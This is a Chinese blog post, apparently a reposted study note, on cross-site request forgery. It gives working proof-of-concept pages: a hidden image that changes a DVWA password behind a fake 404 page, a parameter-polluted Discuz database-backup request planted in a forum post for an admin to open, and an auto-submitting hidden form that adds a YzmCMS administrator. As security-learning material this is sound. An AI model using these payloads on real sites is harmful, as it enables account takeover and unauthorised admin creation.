苏醒的巨人----CSRF

最新推荐文章于 2024-05-29 15:58:18 发布
最新推荐文章于 2024-05-29 15:58:18 发布
阅读量196 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/hackxf/p/CSRF.html
版权

一.CSRF

跨站请求伪造(Cross-Site Request Forgery,CSRF)是指利用
受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点
击恶意链接或者访问包含攻击代码的页面,在受害人不知情的
情况下以受害者的身份向(身份认证信息所对应的)服务器发
送请求,从而完成非法操作(如转账、改密等)

1.可能出现的地方
所有的业务点都需要进行测试
1. 转账
2. 修改密码
3. 个人资料
4. 登陆
5. 加购物车、收藏商品
6. 开通业务
…

2.CSRF漏洞挖掘

csrf感觉好高级的漏洞,有点似懂非懂,还得沉淀,只能照抄老师的方法,等挖到才能自己整理好思路。

1275435-20180504220518141-602427596.png
1275435-20180504220553631-1003953371.png
1275435-20180504220633005-1545971306.png
1275435-20180504220734353-233594001.png
1275435-20180504220750863-567546875.png

二.几个案例

(1).dvwa,级别low

抓一个包,
1275435-20180504182615846-1190619991.png
get方式,只要把url给管理员打开就能修改他的密码。构造get网页

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Document</title>
</head>
<body>
  <img src="http://test.com/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change" border="0" style="display: none;">
  <h1>404</h1>
  <h2>page not found</h2>
</body>
</html>

打开这个页面,密码就会修改

(1). discuz cms 数据库备份csrf

通过双重认证
1275435-20180504184647560-1889044996.png
抓备份数据库的包

1275435-20180504184906012-854886742.png
第一个数据包为假的,过掉
http 参数污染
1275435-20180504185042115-791019992.png
在这构造
1275435-20180504185449289-219373793.png
csrf请求

http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=backup_180504_9dJ7cL
http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=sss&backupfilename=ldx

--还要将最后面的&与=URL编码一下

http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=sss%26backupfilename%3Dldx

然后用普通用户去发帖,把payload放帖子里,让管理员访问触发漏洞
1275435-20180504190312814-2023000047.png
管理员游览后
1275435-20180504190445255-28504633.png

(3)yzcms 添加管理员csrf

在添加管理员处抓个包
1275435-20180504191806727-1536986043.png
是post请求可以尝试转换get请求
写个post的页面

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
     <form name="poc" action="http://test.com/yzmcms/index.php/admin/admin_manage/add.html" method="POST" type="hidden">
      <input type="hidden" name="adminname" value="ldx" />
      <input type="hidden" name="password" value="ldxldx" />
      <input type="hidden" name="password2" value="ldxldx" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" style="display: none;" />
    </form>
</body>
<script>poc.submit();</script>
</html>

1275435-20180504192942515-897295805.png

1275435-20180504192733473-2034821145.png
成功添加用户
1275435-20180504192825177-1865068691.png

转载于:https://www.cnblogs.com/hackxf/p/CSRF.html

diecai2192
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HttpClient 调用远程服务,POST 请求 ,x-csrf-token验证失败,报CSRF token validation failed 问题解决
yinyulong123的博客
04-17 1万+
首先通过 HttpGet 来获取x-csrf-token,代码如下:HttpGet httpget = new HttpGet(url); httpget.setHeader("Content-Type", "application/x-www-form-urlencoded;charset=UTF-8"); httpget.setHeader("Authorization", code); ht...
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
CSrf攻击-苏醒巨人
09-16
CSrf攻击-苏醒巨人
CSRF苏醒巨人
Wawyw's Blog
03-23 187
1、小场面 我点击了一个好友转发的qq空间消息,怎么莫名其妙自己也转发了。 我点击了一个不可描述的网页,然后自己的账号做了一些不可描述的操作。 2、CSRF简介 上面两个场面其实就是利用了 CSRF(Cross Site Request Forgery),即跨站请求伪造。攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。可以这么理解:攻击者盗用了你的身份,以你的名义进行某些不可描述的操作。 想象一下
csrf攻击
3569
06-28 338
原理 : 设计代码者 ,在对数据库进行增删改查时,传递的参数 简单,任何人只要访问指定的 网址,便可以利用当前操作者的身份进行操作。 例子 : A 站存在 CSRF漏洞 (增加管理员一处参数过于简单,没有验证),B站是攻击者的服务器  管理员登陆账户后 在A 站浏览 检查, 攻击者在A站上边发了个 诱惑性的网站链接 ,比如:         我是XXX ,我好寂寞, 快点我~
CSRF攻击
weixin_30952103的博客
07-09 58
求助编辑百科名片 CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与X...
X-CSRF-Token
热门推荐
01-24 1万+
Odata服务HTTP测试总是出现烦人的 CSRF token validation failed (for all modifying requests)忽略下图中的报文错误 怀疑是服务器参数的设置问题,临时应急的话可以先针对这个服务把CSRF校验关掉 SICF找到这个服务 增加一个参数 Modifying request的CSRF这样的工作的: 用一个非修改(non-m...
python csrf token_python爬虫如何获取X-CSRF-Token
weixin_39957647的博客
12-08 2095
headers3 = {"Accept": "application/json, text/javascript, */*; q=0.01","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Connection":...
SAP OData 403 Forbidden X-CSRF-TOKEN
Wriprin 的技术博客
10-24 1281
SAP OData 403 Forbidden「X-CSRF-TOKEN」 Validierung des CSRF-Tokens fehlgeschlagen CSRF 令牌验证失败
DVWA-CSRF
ahannn的博客
02-15 2992
欢迎各位指出错误以及补充有关知识,这一系列用于个人学习记录,在记录DVWA的同时也记录所用的相关知识,尽可能详细写,如果能帮到和我一样的安全小白我很荣幸 文章目录 一 CSRF是什么? 二 CSRF防御与攻击原理 三 DVWA分析 1.low 2.medium 3.high 总结 一、CSRF是什么? CSRF 跨站点请求伪造(Cross—Site Request Forgery) 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求...
x-csrf-token
weixin_30405421的博客
07-12 456
例子:$.ajaxSetup({headers: {'X-CSRF-TOKEN': $('input[name="_token"]').val()}}); 转载于:https://www.cnblogs.com/xiaoyao181/p/5664108.html
Bolt:CSRF扫描仪-源码
05-25
螺栓笨拙的CSRF扫描仪重要的Bolt处于测试的Beta阶段,这意味着可能存在错误。 不鼓励使用此工具。 欢迎提出请求和问题。 如果您对此仓库感兴趣,我也建议您将它放在监视中。工作流程爬行Bolt将目标网站爬网到指定的...
安全性测试--CSRF攻击
02-26
CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。你这可以这么理解CSRF攻击攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做...
Web安全 -- CSRF
fwk19840301的博客
02-12 3259
跨站请求伪造(英语:Cross-site request forgery),也被称为one-click attack或者session riding,通常缩写为CSRF或者XSRF。 CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 例如(CSRF+XSS蠕虫): test.com 存在XSS漏洞! xss.test.com 和他同源! 访...
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 303
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
linnux上安装php zip(ZipArchive)、libzip扩展
最新发布
科小洋的博客
05-29 382
安装顺序:安装zip(ZipArchive),需要先安装libzip扩展安装libzip,需要先安装cmake按照cmake、libzip、zip的先后顺序安装下面的命令都是Linux命令。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 92
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
Ubuntu卸载软件
weixin_43794095的博客
05-23 377
在删除这些目录之前,你必须确定一个非常重要的事情:确认没有任何服务正在使用这些版本的 PHP。如果你删除了正在使用的 PHP 版本的扩展目录,那么依赖于这个版本的 PHP 的网站或服务可能会停止工作。确定了不再需要的 PHP 版本后,你可以卸载它。这将卸载所有 PHP 7.4 相关的包,包括扩展。首先,你可以查看系统中安装了哪些 PHP 版本。卸载特定版本的 PHP
php 一个数组中的元素是否在一个字符串中包含
兔子的博客
05-23 386
是非空的,那么至少有一个元素在字符串中出现;如果它是空的,那么没有任何元素在字符串中出现。这个函数返回子字符串首次出现的位置索引,如果没有找到,它会返回。如果你只是想检查是否至少有一个元素存在,你可以使用。要检查一个数组中的元素是否在一个字符串中出现,你可以使用。php 一个数组中的元素是否在一个字符串中包含。
python x-csrf-token
05-13
在使用 Python 发送 HTTP 请求时,如果请求需要携带 CSRF Token 的话,可以在请求头中添加 "X-CSRF-Token" 字段,并将 Token 值作为其值发送。 以下是一个示例代码: ```python import requests # 假设 CSRF ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值